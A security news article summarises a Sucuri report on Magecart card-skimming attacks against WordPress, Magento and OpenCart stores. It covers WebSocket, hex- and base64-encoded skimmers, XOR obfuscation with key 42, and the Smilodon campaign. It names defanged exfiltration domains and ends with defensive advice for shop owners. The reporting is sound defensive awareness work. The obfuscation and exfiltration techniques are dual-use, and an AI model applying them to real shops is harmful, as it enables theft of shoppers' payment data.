According to the latest report by Sucuri, cybercriminals have begun their festive shopping by launching attacks on online stores. The primary threat at this time is the theft of credit card data using malware known as Magecart. This season attracts hackers due to the surge in online purchases, allowing them to profit from the sale of stolen data on the darknet.
One of the most common methods of attack is the deployment of WebSocket skimmers. Since August of this year, this threat has been detected on 432 sites. Attackers utilize specialized server technologies to clandestinely transfer user data to external servers, evading standard security measures.
The most susceptible platforms to such attacks include WordPress, Magento, and Opencart. For instance, one type of attack involves the use of the FROMCHARCODE function and XOR encryption with the number 42 – a nod to the famous book by Douglas Adams. Analysis reveals that the stolen data is transmitted to suspicious domains like “CDN [.] ICONSTAFF [.] Top.”
Another prevalent method is HEX-coded skimmers that are actively proliferating on websites using Magento and Woocommerce. Malicious code is inserted into databases and JavaScript files, creating fake payment data entry forms. Subsequently, the information is sent to external servers, such as “Cpeciadogfoods [.] Com.”
Furthermore, BASE64-coded injections pose a threat, disguised within WordPress plugins and modules. The malicious code remains concealed within the plugins and is triggered on order pages. This method has gained traction due to the challenges antivirus programs face in detecting it.
Smilodon, a threat targeting WordPress sites, has been leveraging malicious plugins for several years. In the current year, attackers have refined their tactics by swapping standard plugins with random lines to evade protective measures.
To safeguard their online stores during the holiday season, owners are advised to conduct security audits. It is crucial to enable two-factor authentication for administrators, update all plugins and themes, apply the latest security patches for Magento, and verify the reliability of hosting providers. Adhering to these protocols will help prevent data breaches and issues with payment systems.